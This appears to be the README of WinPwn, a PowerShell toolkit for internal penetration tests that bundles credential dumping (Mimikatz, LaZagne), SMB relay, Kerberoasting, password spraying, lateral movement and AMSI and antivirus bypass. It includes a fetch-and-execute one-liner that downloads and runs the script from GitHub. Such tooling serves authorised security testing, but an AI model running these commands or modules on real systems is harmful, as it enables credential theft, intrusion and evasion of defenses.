In many past internal penetration tests I often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support. I often ran the same scripts one after the other to get information about the current system and/or the domain. To automate this process and for the proxy reason I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known large other offensive security Powershell projects. They are loaded into RAM via IEX Downloadstring.

Yes it is not a C# and it may be flagged by antivirus solutions. Windows Defender for example blocks some of the known scripts/functions. Maybe someday a C# Version will follow.

Any suggestions, feedback and comments are welcome!

Just Import the Modules with: Import-Module .\WinPwn_v0.7.ps1 or iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.7.ps1')

Functions available after Import:

• WinPwn -> Guides the user through all functions/Modules with simple questions.

• Inveigh -> Executes Inveigh in a new Console window , SMB-Relay attacks with Session management (Invoke-TheHash) integrated

• sessionGopher -> Executes Sessiongopher Asking you for parameters

• Mimikatzlocal -> Executes Invoke-WCMDump and Invoke-Mimikatz

• localreconmodules -> Collects infosec relevant system Information, Executes passhunt, Get-Computerdetails and Just another Windows Privilege escalation script + Winspect

• JAWS -> Just another Windows Privilege Escalation script

• domainreconmodules ->

  • Powerview function output gets stored on disk for review.
  • A search for AD-Passwords in description fields is done.
  • Unconstrained delegation systems/users are enumerated.
  • SQL Server discovery and Auditing functions (default credentials, passwords in the database and more).
  • MS-RPRN Check for Domaincontrollers
  • An AD-Report is generated in CSV Files (or XLS if excel is installed) with ADRecon.

• Privescmodules -> Executes different privesc scripts in memory (PowerUp Allchecks, Sherlock, GPPPasswords)

• lazagnemodule -> Downloads and executes lazagne.exe (if not detected by AV)

• latmov -> Searches for Systems with Admin-Access in the domain for lateral movement. Mass-Mimikatz can be used after for the found systems. DomainPassword-Spray for new Credentials can also be used here.

• empirelauncher -> Launch powershell empire oneliner on remote Systems

• shareenumeration -> Invoke-Filefinder and Invoke-Sharefinder (Powerview / Powersploit)

• groupsearch -> Get-DomainGPOUserLocalGroupMapping - find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit)

• Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking

• powerSQL -> SQL Server discovery, Check access with current user, Audit for default credentials + UNCPath Injection Attacks

• Sharphound -> Downloads Sharphound and collects Information for the Bloodhound DB

• adidnswildcard -> Create a Active Directory-Integrated DNS Wildcard Record and run Inveigh for mass hash gathering.

The submodule is a forked and edited version of https://github.com/Cn33liz/p0wnedShell. You can compile it yourself and use it for powershell restriction bypass and AMSI-Bypass. Most AV-Solutions can be evaded this way. Just run the executable File, choose 17. and execute WinPwn.

• Some obfuskation
• More obfuscation
• Proxy via PAC-File support
• Get the scripts from my own creds repository (https://github.com/SecureThisShit/Creds) to be independent from changes in the original repositories
• More Recon/Exploitation functions
• msDS-AllowedToActOnBehalfOfOtherIdentity Ressource based constrained delegation

• Kevin-Robertson - Inveigh, Powermad, Invoke-TheHash
• Arvanaghi - SessionGopher
• PowerShellMafia - Powersploit
• Dionach - PassHunt
• A-mIn3 - WINSpect
• 411Hall - JAWS
• sense-of-security - ADrecon
• dafthack - DomainPasswordSpray
• rasta-mouse - Sherlock
• AlessandroZ - LaZagne
• samratashok - nishang
• leechristensen - Random Repo
• HarmJ0y - Many good Blogposts, Gists and Scripts
• NETSPI - PowerUpSQL
• Cn33liz - p0wnedShell

Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.